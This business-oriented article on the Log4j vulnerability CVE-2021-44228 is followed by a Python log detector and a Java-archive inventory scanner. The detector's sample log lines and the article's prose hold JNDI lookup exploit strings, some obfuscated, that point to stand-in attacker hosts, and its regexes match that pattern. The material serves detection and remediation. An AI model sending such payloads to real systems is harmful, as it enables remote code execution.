Why we should care about digital vulnerability
If you are a business leader with little knowledge of the technical intricacies of cybersecurity, you may be wondering why the term “Log4j” is suddenly everywhere.
Digital Transformation (DX) means that practically every business is supported by technology in most areas of the organisation: human resources, marketing, production, operations, finance, customer service and so on. In a hyperconnected world there is little room for not being digital and not being online. Organisations have spent a great deal of budget on DX efforts because DX means business transformation and evolution.
Part of the objectives of cybersecurity is to mitigate risk and ensure business continuity in a digital environment. “The show must go on” always, so goods keep being produced and shipped, customers get serviced and invoiced, and employees remain productive and happy. Another objective is resiliency: if by any chance the business gets interrupted, it must be quickly restored with the lowest amount of effort, impact and cost.
To achieve that, cybersecurity must be broad (deployed everywhere, protecting every digital asset), integrated (the components talk to each other and gain efficiency by doing so) and automated (so that responses require very little human interaction). All of this is meant to provide continuous visibility, to ensure that the technology infrastructure supporting the business is running well, and to avoid disruption by vulnerabilities (flaws in the technology that attackers can use to make computers do things they are not supposed to do).
Why is Log4j relevant to the business?
There are very few cases in which a vulnerability has an impact so severe that it can potentially bring down services of any kind, anywhere. The vulnerability labelled CVE-2021-44228, discovered in a Java library (a set of ready-to-use code that saves development time) named Log4j, has this potential.
As is well known, Java is a programming language and platform created with the objective of writing code (instructions for a computer) once and then running that code everywhere. The concept succeeded, and today it is estimated that more than 15 billion devices run Java: from laptops, tablets and cellphones to robots and home appliances. This means the company web page, the billing system, the payroll, the robots on the production line and more may potentially be affected if they use Java and, within it, this logging library.
The flaw is relevant because it can affect many devices around the world, because it allows an attacker to execute code (run instructions) on them, and because it can be used remotely with little technical knowledge: an attacker only needs to get a specially crafted text string into something the application logs, such as a web request, for the library to fetch and run code from a server the attacker controls. Given that it is relatively easy to do, more skilled adversaries can just as easily automate attacks.
In other words, an averagely skilled technical person could potentially do whatever they want with an affected device from a remote location: change instructions, run unwanted programs, alter electronic records, launch further attacks or shut down services. A more knowledgeable adversary could automate the steps and do more harm. A skilled adversary with more resources (think of organised cybercrime) can do real damage for profit, such as gathering sensitive data from your organisation and extorting you (cyberextortion), or holding your data hostage and asking for a ransom (ransomware). Scary. At least initially.
What can be done?
If a similar vulnerability had been discovered some years ago, it could have been catastrophic. With the technologies, the knowledge and the processes we have today, we don’t need to worry. We need to act.
The vulnerability has already been fixed and there is a software update that solves it. But upgrading all the affected devices will take some time. Sometimes it will require planning maintenance windows to lower the business impact. And the business can’t stop.
Cybersecurity professionals today have at their disposal the technology to prevent a remote malicious user from triggering the vulnerability. This is what technologies like next-generation firewalls and web application firewalls do, by blocking requests that carry the exploit pattern; since attackers disguise those requests to slip past pattern matching, these controls buy time and complement the upgrade rather than replace it. If the exploitation attempt is more sophisticated, technologies like endpoint detection and response can stop the malicious code while the attacker is running it. And from the records generated by the protection controls, cybersecurity personnel can use log analysis and reporting tools or security information and event management (SIEM) platforms to detect whether there is activity related to this vulnerability in your networks, and act on it in an automated way. Eventually, detailed step-by-step action plans can be built for automated response with security orchestration, automation and response (SOAR) platforms. Again: broad, integrated and automated. And the bottom line: there is technology available to help.
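As an added illustration of the log-analysis step (example code written for this page, not Fortinet product logic or anything from the Log4j project): the exploit works by getting a lookup string of the form ${jndi:ldap://attacker-host/x} into something a vulnerable Log4j 2 writes to its log, and attackers hide it with URL encoding and nested lookups such as ${${lower:j}ndi:...}. The detector below normalises each access-log line first and only then looks for the lookup, so the obfuscated variants are caught too. All log lines, addresses and the "nope" wrapper are constructed for the demo.

```python
"""Detect CVE-2021-44228 exploitation attempts in web access logs.

Added example for this page, not code from Fortinet or the Log4j project.
An attacker triggers the flaw by getting ${jndi:ldap://attacker-host/x}
(or a disguised form of it) into something a vulnerable Log4j 2 logs, such
as a User-Agent header or a URL parameter. The detector normalises each
line (URL-decoding and unwrapping the common ${lower:..}, ${upper:..} and
${..:-..} obfuscation wrappers) and then looks for the lookup itself.
All log lines and addresses below are constructed for the demo.
"""
import re
import urllib.parse

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:13:01:15 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.7/b} HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '198.51.100.2 - - [10/Dec/2021:13:02:00 +0000] "GET /login HTTP/1.1" 200 1024 "-" "%24%7Bjndi%3Armi%3A%2F%2F198.51.100.2%2Fc%7D"',
    '10.0.0.8 - - [10/Dec/2021:13:02:30 +0000] "GET /page?tpl=${title} HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:13:03:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${nope:j}ndi:ldap://203.0.113.9/d}"',
    '10.0.0.8 - - [10/Dec/2021:13:04:00 +0000] "POST /api HTTP/1.1" 200 64 "-" "Java/11.0.2"',
]

# ${lower:x} / ${upper:x} wrappers used to hide the letters of "jndi".
LOOKUP_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${something:-x} and ${::-x}: a lookup whose default value is the hidden text.
DEFAULT_VALUE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# The lookup itself after normalisation, e.g. ${jndi:ldap: or ${jndi:rmi:
JNDI_LOOKUP = re.compile(r"\$\{jndi:[a-z]+:")


def normalise(text, max_rounds=5):
    """Undo URL encoding and unwrap nested lookups until nothing changes."""
    current, previous, rounds = text, None, 0
    while current != previous and rounds < max_rounds:
        previous = current
        current = urllib.parse.unquote(current)
        current = LOOKUP_WRAPPER.sub(r"\1", current)
        current = DEFAULT_VALUE.sub(r"\1", current)
        rounds += 1
    return current.lower()


def classify(line):
    """Return 'high', 'medium' or None for one log line."""
    norm = normalise(line)
    if JNDI_LOOKUP.search(norm):
        return "high"    # the lookup is unambiguous after normalisation
    if "${${" in norm or ("${" in norm and "jndi" in norm):
        return "medium"  # nested lookups in request data: obfuscation we did not unwind
    return None


def scan_logs(lines):
    """Run the classifier over access-log lines; returns one finding per hit."""
    findings = []
    for number, line in enumerate(lines, start=1):
        confidence = classify(line)
        if confidence is None:
            continue
        norm = normalise(line)
        findings.append({
            "line": number,
            "source_ip": line.split(" ", 1)[0],   # first field of the access-log format
            "confidence": confidence,
            "payload": norm[norm.find("${"):],
        })
    return findings


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"line {hit['line']:>2} {hit['confidence']:<6} from {hit['source_ip']}: {hit['payload'][:70]}")
```

The "medium" rule deliberately fires on any nested lookup syntax in request data, because a normaliser can never know every wrapper in use; a SIEM rule built this way should therefore route "high" hits to automated blocking of the source and "medium" hits to an analyst.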
There are also processes and frameworks that help cybersecurity professionals deal with situations like this, and incident response services from companies with experience handling incidents, which you can use to avoid working on a trial-and-error basis whose poor handling can be costly to the business; and there are technologies that can protect at every step. Again, what matters is that you act and protect the business.
How can business management support these efforts? Urge your IT and cybersecurity staff to create an inventory of the infrastructure, including third-party and vendor-supplied products, since Log4j is commonly bundled inside other software, so they can upgrade any potentially vulnerable system as soon as possible. Also urge them to adapt the digital defence system so that it blocks, contains and continuously monitors activity around this vulnerability. The cost and effort of responding, as well as the impact on the overall business, will be lower if the actions are executed earlier rather than later.
We will be OK. But we need to react quickly. And adapt, because eventually there will be another similar event, and we need to be better prepared. Because “the show must go on”.
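One way to start the inventory the text asks for, as an added example written for this page rather than anything from Fortinet or the Apache Log4j project: walk a filesystem, open every Java archive (and the archives bundled one level inside it, which is where third-party products usually hide their copy of Log4j), read the log4j-core version from the Maven pom.properties file the official artifacts carry, and check whether JndiLookup.class is still present. The threshold 2.15.0 is an assumption (the release Apache published as the fix for CVE-2021-44228; later advisories recommended newer releases, so use the version your vendor currently recommends), and the archives scanned are constructed on the fly for the demo.

```python
"""Inventory scanner for Log4j 2 archives on a filesystem.

Added example written for this page, not code from Fortinet or the Apache
Log4j project. Walks a directory, opens every .jar/.war/.ear/.zip and the
archives nested one level inside them, reads the log4j-core version from
the Maven pom.properties the official artifacts carry, and checks whether
JndiLookup.class is present. Threshold and sample archives are assumptions.
"""
import io
import os
import re
import tempfile
import zipfile

POM_PATH = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
# Assumption: 2.15.0 is the release Apache published as the fix for CVE-2021-44228.
# Follow-on advisories recommended newer releases, so treat this as a parameter.
MIN_FIXED = (2, 15, 0)


def parse_version(pom_properties):
    """Extract (major, minor, patch) from pom.properties text, or None."""
    match = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.MULTILINE)
    return tuple(int(part) for part in match.groups()) if match else None


def status_for(version, jndi_present, min_fixed):
    if version is None:
        return "unknown"     # log4j-core found but version unreadable: inspect by hand
    if version >= min_fixed:
        return "patched"
    # Deleting JndiLookup.class from an older jar was Apache's documented workaround.
    return "mitigated" if not jndi_present else "vulnerable"


def inspect_archive(zf, label, min_fixed, depth=0, findings=None):
    """Record log4j-core found in an open ZipFile; recurse one level into nested archives."""
    findings = [] if findings is None else findings
    names = set(zf.namelist())
    if POM_PATH in names:
        version = parse_version(zf.read(POM_PATH).decode("utf-8", "replace"))
        jndi_present = JNDI_CLASS in names
        findings.append({"archive": label, "version": version, "jndi_lookup_present": jndi_present,
                         "status": status_for(version, jndi_present, min_fixed)})
    if depth < 1:
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                try:
                    with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                        inspect_archive(inner, f"{label}!{name}", min_fixed, depth + 1, findings)
                except zipfile.BadZipFile:
                    pass     # an entry that only looks like an archive
    return findings


def scan_directory(root, min_fixed=MIN_FIXED):
    """Scan every archive below root; returns a list of finding dicts."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in sorted(filenames):
            if not filename.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, filename)
            label = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with zipfile.ZipFile(path) as zf:
                    inspect_archive(zf, label, min_fixed, 0, findings)
            except zipfile.BadZipFile:
                findings.append({"archive": label, "version": None,
                                 "jndi_lookup_present": False, "status": "unknown"})
    return findings


def make_jar(version=None, jndi_class=False, extra=None):
    """Build a minimal constructed archive in memory (placeholder bytes, not real classes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version:
            zf.writestr(POM_PATH, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if jndi_class:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        for name, data in (extra or {}).items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_demo_tree(root):
    """Write constructed sample archives under root: not real software."""
    samples = {
        "lib/log4j-core-2.14.1.jar": make_jar("2.14.1", jndi_class=True),
        "lib/log4j-core-2.17.1.jar": make_jar("2.17.1", jndi_class=True),
        "lib/commons-io-2.11.0.jar": make_jar(extra={"org/apache/commons/io/IOUtils.class": b"\xca\xfe\xba\xbe"}),
        # an application bundle whose embedded log4j-core had JndiLookup.class removed
        "apps/billing.war": make_jar(extra={"WEB-INF/lib/log4j-core-2.14.1.jar": make_jar("2.14.1", jndi_class=False)}),
    }
    for relative, data in samples.items():
        path = os.path.join(root, relative)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo():
    """Scan a temporary tree of constructed archives; returns {archive: status}."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return {finding["archive"]: finding["status"] for finding in scan_directory(root)}


if __name__ == "__main__":
    for archive, status in sorted(demo().items()):
        print(f"{status:<10} {archive}")
```

Point scan_directory at a real application directory to use it. An unrelated archive such as the constructed commons-io jar produces no finding, a bundled copy inside a .war is reported with the outer file name prefixed, and "unknown" means a human has to look, which is the right default for an inventory.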
— Martin Hoz, Vice-President Engineering, Fortinet Latin America and the Caribbean.